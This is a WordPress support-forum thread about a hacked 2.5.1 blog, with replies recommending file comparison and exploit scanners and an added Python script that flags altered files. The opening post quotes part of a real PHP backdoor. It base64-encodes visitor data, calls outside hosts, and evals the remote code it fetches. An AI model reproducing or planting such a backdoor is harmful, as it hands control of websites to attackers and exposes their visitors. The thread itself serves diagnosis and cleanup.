2.5.1 Hacked

  • Resolved barnyoka


    I discovered recently, thanks to Google Alerts, that my WP blog had been hacked. Actually, I had 3 blogs on my domain, one old one unused, another one dormant but waiting (2.3 I think), and my current one, 2.5.1. Today I’m cleaning up the mess.

    First I completely deleted the unused blog. Then, I took a good look at the dormant one. I compared the files with the downloaded files in my Applications folder of WP 2.5.1. Obviously, there were some discrepancies due to the difference in versions, but I found something else there that was so obviously inappropriate I felt I had to follow up on it. Then, checking my current blog, I discovered the same thing. I’m now working to clean that up, and will upgrade the dormant blog as well.

    In the meantime, I want to tell you what I found. In the Uploads folders in particular, but elsewhere as well, were numbered files (the file names consisted of 5 or 6 digits) and an accompanying .htaccess file.

    The numbered files all contained the same code, shown here in part because I don’t want inadvertently to teach anyone else how to use this:

    $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.$s.”.base64_encode($i).”.”.base64_encode($j); if ((include(base64_decode(“aHR0cDovLw==”).base64_decode(“d3d3My5yc3NuZXdzLndz”).”/?”.$str))){} else if (include(base64_decode(“aHR0cDovLw==”).base64_decode(“d3d3My54bWxkYXRhLmluZm8=”).”/?”.$str));else if ($c=file_get_contents(base64_decode(“aHR0cDovLzcucnNzbmV3cy53cy8/”).$str))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcucnNzbmV3cy53cy8/”).$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

    Thanks to other posts in the support forums, I was on the alert for the base64 stuff, and because there were other Upload folders that did not contain these files, I figure this is the stuff that has been put into my domain by some outsider. Can anyone verify this is so?

    Also, I found the word eval at the beginning of the class-pclzip.php file, and it’s not in the original I have, so I will be changing that as well. I have not yet checked ALL the php files, and if anyone knows which ones are most likely to have been hit, please do share.

    I hope this information is useful to others.
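
The manual check described in the post above (comparing the live files against a clean WordPress download, and looking for numbered files, .htaccess files in Uploads, and eval/base64 calls) can be scripted. The following Python script is an added example, not part of the original thread; the function names, reason strings and the small sample tree built in `demo()` are assumptions constructed for illustration.

```python
import hashlib, os, pathlib, re, tempfile

NUMERIC_NAME = re.compile(r"^\d{5,6}$")   # "5 or 6 digits" file names from the post
SUSPICIOUS = re.compile(rb"\b(?:eval|base64_decode)\s*\(")

def digest(path):
    return hashlib.sha256(pathlib.Path(path).read_bytes()).hexdigest()

def scan(site_root, clean_root):
    """Return {relative path: [reasons]} for files worth a manual look."""
    findings = {}
    for dirpath, _dirs, names in os.walk(site_root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, site_root).replace(os.sep, "/")
            ref = os.path.join(clean_root, rel)
            known = os.path.isfile(ref)
            if known and digest(ref) == digest(path):
                continue                      # byte-identical to the clean download
            reasons = []
            if known:
                reasons.append("differs from clean copy")
            elif rel.startswith(("wp-admin/", "wp-includes/")):
                reasons.append("not in clean copy")
            if NUMERIC_NAME.match(os.path.splitext(name)[0]):
                reasons.append("numeric file name")
            if "uploads/" in rel and name == ".htaccess":
                reasons.append(".htaccess in uploads")
            if SUSPICIOUS.search(pathlib.Path(path).read_bytes()):
                reasons.append("eval/base64_decode call")
            if reasons:
                findings[rel] = reasons
    return findings

def demo():
    files = {  # constructed sample content, not taken from any real site
        "clean/wp-includes/functions.php": b"<?php function wp_ok() {} ?>",
        "clean/wp-includes/class-pclzip.php": b"<?php class PclZip {} ?>",
        "site/wp-includes/functions.php": b"<?php function wp_ok() {} ?>",
        "site/wp-includes/class-pclzip.php": b"<?php eval($x); class PclZip {} ?>",
        "site/wp-content/uploads/2008/48213": b"<?php eval(base64_decode('c2FtcGxl')); ?>",
        "site/wp-content/uploads/2008/.htaccess": b"# constructed\n",
    }
    root = tempfile.mkdtemp()
    for rel, body in files.items():
        p = pathlib.Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
    return scan(os.path.join(root, "site"), os.path.join(root, "clean"))
```

Files that match the clean download byte for byte are skipped, so core files that use `eval` or `base64_decode` in the clean copy are not reported; the clean copy must be the same WordPress version as the site being checked.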


Viewing 4 replies - 1 through 4 (of 4 total)
  • whooami



    check your wp-includes/functions.php

    2 bits says it's been altered in at least one place — maybe 2.

    If you're interested, and doing comparisons on a Windows box, I recommend wingrep, downloadable from the .com domain of the same name.

    PS: consider yourself lucky, if for no other reason than this: 2 hacked sites that I cleaned up (neither of which were my own) had between 1000 and 3000 files inside a directory.

    There is a WordPress Exploit Scanner that can help you identify compromised files. This plugin searches the files and database of your website for signs of suspicious activity.

    Unmask Parasites

    Thanks to you both! Unmask Parasites says all sites are now clear. I have downloaded the Exploit plugin and will implement that asap. My functions.php file seems clean. Now all I have to do is get my dormant blog to run after upgrade, but I’m grappling with that under another post in the Support Forum. Thanks again for all your help!


    Unmask Parasites is only in beta stage and there’s no guarantee it catches all exploits. You should use some server side scanners like the WordPress Exploit Scanner – it can check theme files and your database for known exploits.

  • The topic ‘2.5.1 Hacked’ is closed to new replies.